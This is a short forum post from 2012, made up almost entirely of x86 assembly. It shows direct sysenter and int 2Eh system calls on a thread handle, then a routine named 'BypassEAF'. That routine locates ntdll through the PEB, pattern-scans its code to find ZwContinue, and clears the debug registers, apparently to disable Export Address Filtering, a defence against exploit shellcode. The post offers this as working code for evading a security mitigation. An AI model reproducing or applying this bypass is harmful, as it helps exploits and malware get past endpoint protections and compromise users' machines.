Indy
February 19th, 2012, 06:46
Code:
push esp
push NtCurrentThread ; -2
mov eax,0D5H
Call Stub ; T-frame.rEdx + 2*4: Arg's, T-frame.rEsp: T-frame.rEdx, T-frame.rEip: @KiFastSystemCallRet(Ret).
add esp,sizeof(CONTEXT)
ret
Stub:
Call Gate
retn 2*4
Gate:
mov edx,esp
db 0Fh, 034h ; sysenter
Code:
push esp
mov eax,0D5H
push NtCurrentThread ; -2
push eax
Call Gate
add esp,sizeof(CONTEXT) + 2*4 + 4
ret
Gate:
mov edx,esp
db 0Fh, 034h ; sysenter
Code:
push esp
push NtCurrentThread ; -2
mov eax,0D5H
mov edx,esp
Int 2EH
add esp,2*4 + sizeof(CONTEXT)
That's better. How to get a service ID ?
Code:
%GET_NT_BASE macro Reg32
mov Reg32,fs:[TEB.Peb]
mov Reg32,PEB.Ldr[Reg32]
mov Reg32,PEB_LDR_DATA.InLoadOrderModuleList.Flink[Reg32]
mov Reg32,LDR_DATA_TABLE_ENTRY.InLoadOrderModuleList.Flink[Reg32]
mov Reg32,LDR_DATA_TABLE_ENTRY.DllBase[Reg32] ; ntdll.dll
endm
BypassEAF proc uses esi edi
Local Context[300H]:BYTE
%GET_NT_BASE Eax
mov edi,eax
mov esi,eax
add eax,IMAGE_DOS_HEADER.e_lfanew[eax]
add edi,IMAGE_NT_HEADERS.OptionalHeader.BaseOfCode[eax]
mov ecx,IMAGE_NT_HEADERS.OptionalHeader.SizeOfCode[eax]
mov ax,51H ; push ecx
sub ecx,20H
@@:
; 51 53 xx xx xx xx xx 0A C0 74 xx 5B 59 6A 00 51 E8 xx xx xx xx
repne scasb
jne Error
cmp byte ptr [edi],53H ; push ebx
jne @b
cmp word ptr [edi + 6],0C00AH ; or al,al
jne @b
cmp byte ptr [edi + 8],74H ; je
jne @b
cmp dword ptr [edi + 10],006A595BH ; pop ebx/pop ecx/push 0
jne @b
cmp word ptr [edi + 14],0E851H ; push ecx/call ZwContinue
jne @b
mov edx,dword ptr [edi + 16]
xor eax,eax
lea edx,[edx + edi + 20]
push eax
lea edi,Context
mov ecx,8
push edi
rep stosd
mov dword ptr [Context],CONTEXT_DEBUG_REGISTERS ; ContextFlags
Call Edx ; ZwContinue()
mov eax,esi
Exit:
ret
Error:
xor eax,eax
jmp Exit
BypassEAF endp
